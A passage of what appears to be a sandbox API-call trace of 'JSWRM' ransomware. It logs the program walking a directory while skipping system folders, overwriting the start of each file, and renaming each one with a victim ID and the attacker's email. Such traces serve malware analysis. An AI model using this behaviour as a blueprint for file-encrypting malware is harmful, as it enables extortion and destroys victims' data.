17 [0060.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0060.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0060.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0060.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0060.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0060.623] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="netfx_Core.mzz", cAlternateFileName="NETFX_~1.MZZ")) returned 1 [0060.623] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2=".") returned 1 [0060.623] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="..") returned 1 [0060.623] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="...") returned 1 [0060.623] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="windows") returned -1 [0060.623] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="recovery") returned -1 [0060.623] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="perflogs") returned -1 [0060.623] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="documents and settings") returned 1 [0060.623] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="$RECYCLE.BIN") returned 1 [0060.623] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="system volume information") returned -1 [0060.623] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="msocache") returned 1 [0060.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0060.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core.mzz", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0060.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core.mzz", cchWideChar=14, lpMultiByteStr=0x345f978, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Core.mzz", lpUsedDefaultChar=0x0) returned 14 [0060.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0060.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0060.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core.mzz", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0060.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core.mzz", cchWideChar=14, lpMultiByteStr=0x345f948, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Core.mzz", lpUsedDefaultChar=0x0) returned 14 [0060.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0060.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0060.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0060.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0060.623] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0060.624] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=181483595) returned 1 [0060.624] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0060.625] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0060.715] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.715] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0060.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.716] CloseHandle (hObject=0x450) returned 1 [0061.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0061.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0061.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0061.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0061.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0061.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0061.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0061.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0061.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0061.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0061.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0061.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0061.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0061.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0061.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0061.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0061.552] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0061.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0061.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0061.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0061.554] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="netfx_Core_x64.msi", cAlternateFileName="NETFX_~1.MSI")) returned 1 [0061.554] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2=".") returned 1 [0061.555] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="..") returned 1 [0061.555] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="...") returned 1 [0061.555] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="windows") returned -1 [0061.555] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="recovery") returned -1 [0061.555] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="perflogs") returned -1 [0061.555] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="documents and settings") returned 1 [0061.555] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="$RECYCLE.BIN") returned 1 [0061.555] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="system volume information") returned -1 [0061.555] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="msocache") returned 1 [0061.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0061.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core_x64.msi", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0061.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0061.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core_x64.msi", cchWideChar=18, lpMultiByteStr=0x2412e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Core_x64.msi", lpUsedDefaultChar=0x0) returned 18 [0061.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0061.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0061.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core_x64.msi", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0061.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0061.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core_x64.msi", cchWideChar=18, lpMultiByteStr=0x241290, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Core_x64.msi", lpUsedDefaultChar=0x0) returned 18 [0061.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0061.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0061.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0061.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0061.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0061.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0061.555] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0061.556] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=1901056) returned 1 [0061.557] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0061.557] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0061.571] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.571] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0061.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0061.572] CloseHandle (hObject=0x450) returned 1 [0061.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0061.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0061.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0061.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0061.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0061.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0061.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0061.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0061.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0061.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0061.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0061.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0061.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0061.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0061.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0061.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0061.685] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0061.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0061.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0061.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0061.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0061.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0061.686] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="netfx_Core_x86.msi", cAlternateFileName="NETFX_~2.MSI")) returned 1 [0061.686] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2=".") returned 1 [0061.686] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="..") returned 1 [0061.686] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="...") returned 1 [0061.686] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="windows") returned -1 [0061.686] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="recovery") returned -1 [0061.686] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="perflogs") returned -1 [0061.686] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="documents and settings") returned 1 [0061.686] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="$RECYCLE.BIN") returned 1 [0061.686] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="system volume information") returned -1 [0061.686] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="msocache") returned 1 [0061.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0061.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core_x86.msi", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0061.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0061.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core_x86.msi", cchWideChar=18, lpMultiByteStr=0x241178, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Core_x86.msi", lpUsedDefaultChar=0x0) returned 18 [0061.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0061.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0061.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core_x86.msi", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0061.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0061.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="netfx_Core_x86.msi", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netfx_Core_x86.msi", lpUsedDefaultChar=0x0) returned 18 [0061.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0061.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0061.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0061.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0061.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0061.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0061.686] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0061.688] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=1163264) returned 1 [0061.688] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0061.688] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0061.701] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.701] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0061.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0061.701] CloseHandle (hObject=0x450) returned 1 [0061.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0061.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0061.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0061.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0061.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0061.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0061.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0061.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0061.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0061.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0061.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0061.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0061.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0061.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0061.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0061.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0061.852] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: 